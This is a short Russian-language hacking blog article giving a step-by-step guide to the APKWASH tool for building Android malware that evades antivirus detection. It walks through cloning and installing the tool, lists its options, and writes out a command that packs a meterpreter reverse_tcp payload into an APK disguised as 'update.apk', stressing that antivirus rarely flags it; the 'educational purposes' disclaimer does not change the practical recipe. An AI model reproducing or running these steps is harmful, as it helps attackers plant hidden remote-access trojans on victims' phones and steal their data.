Обход антивируса при помощи Apkbleach
Life-Hack [Жизнь-Взлом]/ХакингДоброго времени суток! В этой небольшой статье расскажем вам о том, как обходить антивирус при помощи инструмента под названием apkbleach/apkwash.
Итак, начнем.
ВНИМАНИЕ! Данная статья несёт чисто ознакомительный характер. Автор статьи не несёт никакой ответственности за ваши действия, после прочтения данного материала.
Обход антивируса на android - одна из самых сложных задач. Ну, по крайней мере, так было раньше. Сейчас есть инструмент, под названием APKWASH, который может скрыть вредоносные приложения от обнаружения большинством антивирусов. Он показывает, насколько слабое антивирусное программное обеспечение и почему вам не следует загружать приложения из неизвестных источников.
Шаг 1. Загрузите APKWASH Tool и клонируйте его в Kali Linux с помощью следующей команды:
git clone https://github.com/jbreed/apkwash.git
Шаг 2: Дайте инструменту разрешения на выполнение, с помощью следующей команды:
chmod + x apkwash mv apkwash / usr / local / bin /.
Шаг 3: Теперь мы можем использовать следующую команду для создания вредоносного файла:
Ниже приведены параметры, которые можно использовать для создания вредоносных файлов
-p | –Payload <payload> Устанавливает полезную нагрузку, которая будет сгенерирована msfvenom.
-о | –Output <outfile.apk> Устанавливает имя созданного APK, а также выходной файл apk.
-x | –Original <infile.apk> APK, в который будет внедряться полезная нагрузка
-g | –Generate Сгенерировать полезную нагрузку с использованием значений по умолчанию
-n | –Newkey Сгенерировать новый ключ отладки перед подписью
-v | –Verbose Не маскировать вывод команд
-d | –Debug Оставляет файлы / tmp / payload на месте для просмотра
-h | –Help Справочная информация
apkwash -p android / meterpreter / reverse_tcp LHOST = 192.168.0.12 LPORT = 1337 -o update.apk
Шаг 4: Теперь у вас есть вредоносный apk-файл, который не может быть обнаружен антивирусом. Есть несколько антивирусов, которые могут пометить этот файл как вирус, но это случается редко.
Редактируйте скрипт и улучшайте его.
Будьте осторожны и используйте данный инструмент только в образовательных целях!